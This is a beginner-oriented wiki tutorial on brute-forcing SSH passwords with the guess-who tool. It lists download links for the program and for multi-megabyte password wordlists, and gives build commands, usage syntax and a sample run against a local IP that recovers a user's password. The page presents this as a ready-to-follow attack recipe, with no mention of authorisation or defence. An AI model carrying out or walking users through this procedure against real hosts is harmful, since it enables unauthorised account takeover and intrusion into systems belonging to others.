#format wiki
#language en

== Brute Force ssh (for n00bs) ==

Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts. <<BR>>
It is available from http://packetstormsecurity.org/ <<BR>>

=== Required Files and programs ===

It is ''' NOT ''' required to download ALL files here. Please read ''' CAREFULLY! ''' <<BR>>
 * Choose ''' 1 ''' from the following: <<BR>>

   || [[http://www.ac3bf1.org/files/sec/all_merged.tar.gz|all_merged.tar.gz]] || [[http://www.ac3bf1.org/files/sec/all_merged.zip|all_merged.zip]] || ('''~20MB!''' - 67MB uncompressed) || - Several passwords ||
   || [[http://www.ac3bf1.org/files/sec/common_merged.tar.gz|common_merged.tar.gz]] || [[http://www.ac3bf1.org/files/sec/common_merged.zip|common_merged.zip]] || (~6.5MB - 18MB uncompressed) || - Selection of common passwords ||

<<BR>>

 * Required Program: <<BR>>
   [[http://www.ac3bf1.org/files/sec/guess-who-0.44.tgz|guess-who-0.44.tgz]] (16.1 KB) - Linux program to Brute Force SSH <<BR>>
 * In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files <<BR>>
   [[http://www.ac3bf1.org/files/sec/uumerge.zip|uumerge.zip]] (55.1 KB) Wind0ws merging program <<BR>>
 * The following are to be chosen if you want to create personalized password files.
   [[http://www.ac3bf1.org/files/sec/common.tar.gz|common.tar.gz]] | [[http://www.ac3bf1.org/files/sec/common.zip|common.zip]] (35 files - 6322.2 KB) - Several passwords not merged '''(~6MB)'''  <<BR>>
   [[http://www.ac3bf1.org/files/sec/all.tar.gz|all.tar.gz]] | [[http://www.ac3bf1.org/files/sec/all.zip|all.zip]] (46 files - 19130.5 KB) - Selection of common passwords not merged '''(~20MB!)''' <<BR>>

=== Procedure ===

Installation: <<BR>>
Download to the desired directory <<BR>>
{{{
tar -zxvf guess-who-0.44.tgz
make
}}}
<<BR>>
Execution: <<BR>>
{{{
[root@hacker guess-who]# ./b

guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de

Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries]
Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file

}}}
Expected output: <<BR>>
{{{
[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt
(!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ]
[ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]
}}}
As you can see the user kev has a password of arsenal <<BR>>